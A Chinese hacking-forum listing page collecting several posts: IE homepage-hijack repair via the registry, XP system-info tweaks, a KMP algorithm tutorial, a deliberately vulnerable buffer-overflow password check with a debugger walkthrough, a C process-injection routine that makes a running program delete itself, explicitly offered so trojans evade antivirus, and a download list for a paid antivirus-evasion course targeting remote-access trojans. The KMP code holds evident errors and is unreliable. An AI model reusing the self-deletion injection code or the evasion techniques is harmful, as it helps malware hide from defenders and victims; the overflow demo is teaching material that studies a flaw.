板块-红黑技术 - 洞洞！

IE首页的注册表文件是放在HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page下的，而这个子键的键值就是IE首页的网址。以笔者的电脑为例，键值是http://www.sina.com.cn，它是可以修改的，用户可以改为自己常用的网址，或是改为“about:blank”，即空白页。这样，你重启IE就可以看到效果了。

如果这种方法也不能奏效，那就是因为一些病毒或是流氓软件在你的电脑里面安装了一个自运行程序，就算你通过修改注册表恢复了IE首页，但是你一重新启动电脑，这个程序就会自动运行再次篡改。

这时候，我们需要对注册表文件进行更多的修改，运行“regedit”，然后依次展开HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Current Version\Run主键，然后将其下的registry.exe子键删除，然后删除自运行程序c:\Program Files\registry.exe，最后从IE选项中重新设置起始页就好了。

除了上面的情况外，有些IE被改了起始页后，即使设置了“使用默认页”仍然无效，这是因为IE起始页的默认页也被篡改啦。对于这种情况，我们同样可以通过修改注册表来解决，运行“regedit”展开HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\Default_Page_URL子键，然后将“Default_Page_UR”子键的键值中的那些篡改网站的网址改掉就好了，或者设置为IE的默认值。

方法三:使用IE修复软件

虽然修改注册表的方法十分有效，但是对于一般的电脑用户来说较为专业，而且编辑过程中也涉及到了比较多的英语。因此，我们在这里介绍大家使用一些专门的修复工具。

一般来说，IE修复工具有两大类。一是商业机构提供的辅助性工具，如瑞星注册表修复工具、3721的上网助手中附带的IE修复专家、超级兔子中的IE修复工具等等，这些软件大多捆绑在商业软件或是工具软件中，有些还需要付费才能够使用。其特点是，功能强大，建议经济实力较强的用户使用。

其中瑞星的注册表修复工具是可以免费单独下载的，尤其推荐大家使用，其下载网址是http://it.rising.com.cn/service/technology/RegClean_download.htm。具体的使用办法可以参考这些软件的帮助文件。

另外一类IE修复软件则主要是技术实力比较强的网友自行编写的，其使用效果和瑞星、IE修复专家、超级兔子等相似，但是需要大家自己搜索下载。

这里向大家推荐两款:一款是IE浏览器修复工具，其下载地址是http://down.tiansha.net/crskypath2/tiansha.net－iefixcr.rar。这个软件的最大特点是功能齐全、界面简洁，而且是个绿色软件，不用安装。另一款是首页绑架克星－HijackThis，其下载地址是http://cq－http.okget.com/HijackThis.zip。它能够将绑架您浏览器的程序揪出来，并且将之删除。不过这个程序是用Visual Basic语言编写的，大家在使用它之前要先安装VB的语言库，相对麻烦一些。

[查看全文]

run

展开Biu

#include <windows.h>
BOOL DeleteMyself(WCHAR *pHelper)
{
int ret;
WCHAR helper[MAX_PATH];
ZeroMemory(helper, sizeof(helper));
if (pHelper)
wcsncpy(helper, pHelper, MAX_PATH-2);
else
wcscpy(helper, L"calc.exe");
STARTUPINFOW si = {sizeof(STARTUPINFOW),0};
PROCESS_INFORMATION pi;
HANDLE hSYNC = OpenProcess(SYNCHRONIZE, TRUE, GetCurrentProcessId());
if (CreateProcessW(NULL, helper, 0, 0, TRUE, CREATE_SUSPENDED, 0, 0, &si, &pi))
{
CONTEXT ctx = {CONTEXT_FULL,0};
ret = GetThreadContext(pi.hThread, &ctx);
WCHAR MyselfPath[MAX_PATH];
int nPathLen = GetModuleFileNameW(NULL, MyselfPath, MAX_PATH);
struct StackContext
{
DWORD_PTR DeleteFileW;
DWORD_PTR WaitForSingleObject_argv1;
DWORD_PTR WaitForSingleObject_argv2;
DWORD_PTR ExitProcess;
DWORD_PTR DeleteFileW_argv1;
DWORD_PTR shit;
DWORD_PTR ExitProcess_argv1;
}stackctx;
HMODULE hKernel32 = GetModuleHandleW(L"Kernel32.dll");
ctx.Eip = (DWORD_PTR)GetProcAddress(hKernel32, "WaitForSingleObject");
ctx.Esp = (DWORD_PTR)VirtualAllocEx(pi.hProcess, 0, 512*1024, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
ctx.Esp += 256*1024;
stackctx.DeleteFileW = (DWORD_PTR)GetProcAddress(hKernel32, "DeleteFileW");
stackctx.WaitForSingleObject_argv1 = (DWORD_PTR)hSYNC;
stackctx.WaitForSingleObject_argv2 = (DWORD_PTR)-1;
stackctx.ExitProcess = (DWORD_PTR)GetProcAddress(hKernel32, "ExitProcess");
stackctx.DeleteFileW_argv1 = (DWORD_PTR)VirtualAllocEx(pi.hProcess, 0, (nPathLen+1)*sizeof(WCHAR), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
ret = WriteProcessMemory(pi.hProcess, (LPVOID)stackctx.DeleteFileW_argv1, MyselfPath, (nPathLen+1)*sizeof(WCHAR), NULL);
if (!ret) return FALSE;
stackctx.shit = 0;
stackctx.ExitProcess_argv1 = 0;
ret = WriteProcessMemory(pi.hProcess, (LPVOID)(ctx.Esp), &stackctx, sizeof(stackctx), NULL);
if (!ret) return FALSE;
ret = SetThreadContext(pi.hThread, &ctx);
if (!ret) return FALSE;
ResumeThread(pi.hThread);
CloseHandle(pi.hThread);
CloseHandle(pi.hProcess);
return TRUE;
}else
{
return FALSE;
}
}
int main()
{
DeleteMyself(0);
return 0;
}
//2000/xp/2003/vista 上已经测试通过
此代码用于木马在运行完后,在内存中将自己的进程结束,从而躲过杀毒软件的查杀!!慎用!
[查看全文]

xiaowuhello

展开Biu

如何手动修改xp系统属性信息 it你好论坛原创教程

一、修改“制造商与技术支持商”

在开始、运行中输入notepad.exe c:\windows\system32\oeminfo.ini命令会打开一个文本文档，删除[Support Information]以下的所有信息，文件、保存即可。

上面的文件信息也可以更改的，大家试试吧。！~

二、如何修改xp系统属性中"注册到"中的名字

在开始－运行中输入regedit（注册表）打开 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion

更改RegisteredOrganization和RegisteredOwner的资料值为自己喜欢的资料即可

下面是技术支持信息

三、不需要修改注册表，也不借用任何第三方软件，便可安全、快速地实现机器的安全控制。现在以禁止修改“日期/时间”属性为例加以说明：

找到Windows系统安装目录下System32文件夹中的Timedate.cpl文件（如C:\WINDOWS\system32\Timedate.cpl），然后将其移走。这样，无论你通过“任务栏属性”还是“控制面板”，都不能对“日期/时间”属性进行修改，从而有效地维护了机器。

相关知识：cpl类型文件为控制面板扩展文件，每个cpl文件实际上都对应着系统的某种功能，如果将它们移走，便会限制相应的功能。以下列出各cpl文件对应功能，供大家参考。

Access.cpl 对应“辅助选项属性”

Appwiz.cpl 对应“添加/删除程序属性”

Desk.cpl 对应“显示属性”

Intl.cpl 对应“区域设置属性”

Inetcpl.cpl 对应“Internet属性”

Joy.cpl 对应“游戏控制器”

Main.cpl 对应“鼠标属性”

Mmsys.cpl 对应“多媒体属性”

Netcpl.cpl 对应“网络属性”

Password.cpl 对应“密码属性”

Powercfg.cpl 对应“电源管理属性”

Sticpl.cpl 对应“扫描仪和数码相机属性”

Sysdm.cpl 对应“系统属性”

Telephon.cpl 对应“拨号属性”

Timedate.cpl 对应“日期/时间属性”

小提示：在移走这些cpl文件时，不要打开控制面板，否则有可能会因为这些文件正在被调用而无法移动。另外，某些cpl文件的移动需要在“安全模式”下进行，如Sysdm．cpl，这是因为在常规模式下，系统登录后该文件将被调用，这时将它移走，系统会自动将其恢复。

四、如何修改系统制造商和技术支持商的图片

制作一张大小约是160*120像素或者是180*82的bmp图片（这里的图片大小不一定非按规定的尺寸），命名为oemlogo.bmp，放在C:\WINDOWS\system32下，替换原有的oemlogo.bmp即可。

五、cpu信息

1、HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0修改ProcessorNameString信息

2、HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\ACPI\GenuineIntel_-_x86_Family_15_Model_6\_0先在0上点右键－权限，设置为完全控制，再修改FriendlyName的信息。

[查看全文]

xiaowuhello

展开Biu

安防快线最新vip免杀教程 (要下的快下)

好东西一起分享嘛

下了不要不留言！！

小建议：免杀不是一课两课就学会的，安心得学

第一课;免杀的历史发展各种杀软的特点

下载地址： http://vip1.sec520.com/ms/mslshfz.rar

第二课;一台电脑如何装多个杀软

下载地址： http://vip1.sec520.com/ms/azdgsr.rar

第三课;免杀的原理与工作名词的解释及常用工具的介绍

下载地址： http://vip1.sec520.com/ms/msylhcygj.rar

第4课;壳的概念与国内外优秀壳讲解实战免杀

下载地址： http://vip1.sec520.com/ms/kdgyhgnwyxk.rar

第5课;灵活使用免杀工具(上)

http://vip1.sec520.com/ms/5.rar

第6课;灵活使用免杀工具(下)

http://vip1.sec520.com/ms/6.rar

第7课;改壳免杀的理由

http://vip1.sec520.com/ms/7.rar

第8课;实战改各类壳免杀

http://vip1.sec520.com/ms/8.rar

第9课;花指令的概念与认识花指令

http://vip1.sec520.com/ms/9.rar

第10课;菜鸟如何写自己的花指令

http://vip1.sec520.com/ms/10.rar

第11课;灵活运用花指令

http://vip1.sec520.com/ms/11.rar

第12课;花指令多重跳转法免杀全免杀的捆绑器

http://vip1.sec520.com/ms/12.rar

第13课;SEH异常结合花指令免杀一批杀软

http://vip1.sec520.com/ms/13.rar

第14课;特征码定位工具MYccl的实战应用(上)

http://vip1.sec520.com/ms/14.rar

第15课;特征码定位工具MYccl的实战应用(下)

http://vip1.sec520.com/ms/15.rar

第16课;上兴远程瑞星表面特证码修改

http://vip1.sec520.com/ms/16.rar

第17课;上兴内存特证码定位及免杀

http://vip1.sec520.com/ms/17.rar

第18课;MYccl主动防御定位讲解

http://vip1.sec520.com/ms/18.rar

第19课;灰鸽子主动防御特征码修改免杀

http://vip1.sec520.com/ms/19.rar

第20课;MYCLL和multiCCL的使用方法和区别

http://vip1.sec520.com/ms/20.rar

第21课;C32Asm修改字符串大小写与中文替换法讲解

http://vip1.sec520.com/ms/21.rar

转载请注明出自暗组信息安全论坛 http://forum.darkst.com/,

本贴地址:http://forum.darkst.com/viewthread.php?tid=49059

[查看全文]

run

展开Biu

#include<stdio.h>
#include<string.h>
#define PASSWORD "1234567"
int verify_password(char *password)
{
int authenticated;
char buffer[8];//here!BUG
authenticated=strcmp(password,PASSWORD);
strcpy(buffer,password);//here!BUG
return authenticated;
}
main()
{
int valid_flag=0;
char password[1024];
while(1)
{
printf("please input password     ");
scanf("%s",password);
valid_flag=verify_password(password);
if(valid_flag)
{
printf("incorrect password!\n\n");
}
else
{
printf("congratultion!you have passed the verification!\n");
break;
}
}
getchar();
getchar();
}
复制以上代码,用VC++编译.....
并命名为overflow
得到.exe文件,,,,,执行看下,,,,,
本来输入1234567才可通过验证,,,,
可是,输入qqqqqqqq一样通过,(因为有BUG)
OD载入,,,,,在call overflow.strcmp的下一条语句:add esp,8下断点,,,,(F2),,,,
按F9运行程序,,,,,输入qqqqqqqq成功截断,,,,,F8单步执行,,,,,,直到call overflow._chkesp(此条不运行),
注意观看OD的右下角,,,,,,此时可看到:(这是我的机器,可能会因为不同的硬件配置而异)
0012FAD8 71717171 qqqq
0012FADC 71717171 qqqq
0012FADC 00000000 ....
所以此时authenticated的值已被修改为00 00 00 00(本来是00 00 00 01见0012FADC 00000000 ....),
最后一个q使buffer的最后一个标志字符数组结束的'\0'(NULL)冲掉01,从而使结果出现错误,就这样就通过验证...
[查看全文]

xiaowuhello

展开Biu

大话KMP算法（原创）
最近在学习数据结构。遇到KMP算法的时候，研究了好几天，终于弄明白了算法的思想。
今天心情很不爽（因为被二叉树给难住了，哎！）。就写一下KMP算法吧。望编程高手给予指点。
请注意，在看这篇文章之前，请务必先看看严蔚敏老师的《数据结构》中的串的模式匹配算法（P79）这一节，在看不
懂KMP算法的时候再看下面这篇文章。当然，基本的模式匹配算法请务必先看懂。
KMP算法思想：1.设S为主串（目标串），T为模式串，以i和j分别指示主串和模式串中正待比较的字符，若Si=Tj，则i
和j分别加1，继续比较Si和Tj（其实，这个时候是比较Si+1和Tj+1了）；否则，i不变，而j退回到j=next[j]的位置，
继续比较Si和Tj（其实，这个时候是比较Si和Tnext[j]）。以上两种情况是，若新的Si=Tj，则i和j分别加1，继续往后
比较，若不相等，则j接着退到下一个j=next[j]的位置，再比较新的Si和Tj。直到下列两种情况之一：一是j退回到某
个j=next[j]的位置时，有Si=Tj，则i和j各加1继续往后比较；二是j退回到j=0时（即模式串的第1个字符失配），则将
从Si+1和T1重新开始往后比较。
1.KMP算法//利用模式串中的next函数求Tj!=Si是，指针j应退回的位置
int Index_KMP(SString S,SString T,int pos)
{
int i,j;
i=pos;
j=1;
while(i<=S[0] && j<=T[0])
{
if(j==0 || j<=T[j])//j==0表示模式串中第一个字符即和Si失配，则应从Si+1和T1开始重新比较
{
++i;
++j;
}
else
{
j=next[j];//即next[j]=k,j应退回到k的位置，即从Si和Tk开始重新比较
}
}
if(j>T[0])
return i-T[0];
else
return 0;
}
2.接下来就是如何求next[j]了。因为已知next[1]=0，之一找出next[j+1]与next[j]之间的关系，就可以求出模式串中
所有的next[j]。
初始算法：
(1)初值next[1]=0；
(2)设next[j]=k，于是有"T1......Tk-1"="Tj-k+1......Tj-1";
(2-1)若Tj=Tk，则有"T1......Tk-1Tk"="Tj-k+1......Tj-1Tj";故此时有next[j+1]=k+1=next[j]+1。
(2-2)若Tj!=Tk,设next[k]=k',则有"T1......Tk'-1"="Tj-k'+1......Tj-1"。
(2-1-1)若Tj=Tk',则next[j+1]=k'+1=next[k]+1=next[next[j]]+1;
(2-1-2)若Tj!=Tk',则重复(2-2)直到不存在kn为止，则此时有next[j+1]=1。
2.求next函数的算法(求模式串T的next函数值并存入数组next中)
void get_next(SString T,int next[])//因为形参是数组，故不需要引用类型
{
int j,k;
j=1;
next[j]=k=0;//写成这样是因为我觉得更好理解一点
while(j<T[0])
{
if(k==0 || T[j]==T[k])没有重叠真子串或有重叠真子串但T[j]==T[k]时,都可求出next[j+1]的值
{
++j;
++k;
next[j]=k;//其实，这三句等价于next[++j]=++k;即next[j+1]=next[j]+1
}
else //否则(即有重叠真子串，但此时T[j]!=T[k])，则此时无法求出next[j+1]的值，那么此时
k=next[k];子串T应再跳到k'= next[k]去匹配，直到kn=0或者T[j]=T[kn]
}
}
//k==0表示没有重叠真子串（next[j]=k=0），此时应该从Si+1与T1开始比较。那么当Tj+1与Si'不匹配时,next[j+1]
=1.即i'不变，子串从T1开始一Si'开始向后比较。
//T[j]==T[k]表示有重叠真子串，但此时亦有T[j]=T[k].则此时有next[j+1]=next[j]+1
3.但是，上面的思想还有一个缺陷，在求出next[j]=k时，若T[j]=T[k]，则由于T[j]!=S,必然有T[k]也不会等于S
，此时就要继续k'=next[k],直到T[j]!=T[kn].此即nextval[]数组的求法。
3.求nextval函数的算法
void get_nextval(SString T,int nextval[])
{
j=1;
nextval[j]=k=0;
while(j<T[0])
{
if(k==0 || T[j]==T[k])
{
++j;
++k;
if(T[j]!=T[k])
nextval[j]=k;//这时T[j]实际上是T[j+1],T[k]实际上是T[k+1]
else
nextval[j]=nextval[k];
}
else
k=next[k];//否则，j不变，k退回到next[k]的位置
}
}
在实际运用时，只需要1和3即可。即只需要Index_kmp和get_nextval两个即可。
注：不是我不注重编程规范，而是文本格式的限制，我也没办法。先凑合着吧，反正算法注重的是思想。一点格式问题也不要紧了哈...
转载请注明出自暗组信息安全论坛 http://forum.darkst.com/,本贴地址:http://forum.darkst.com/viewthread.php?tid=56082
[查看全文]

首页

末页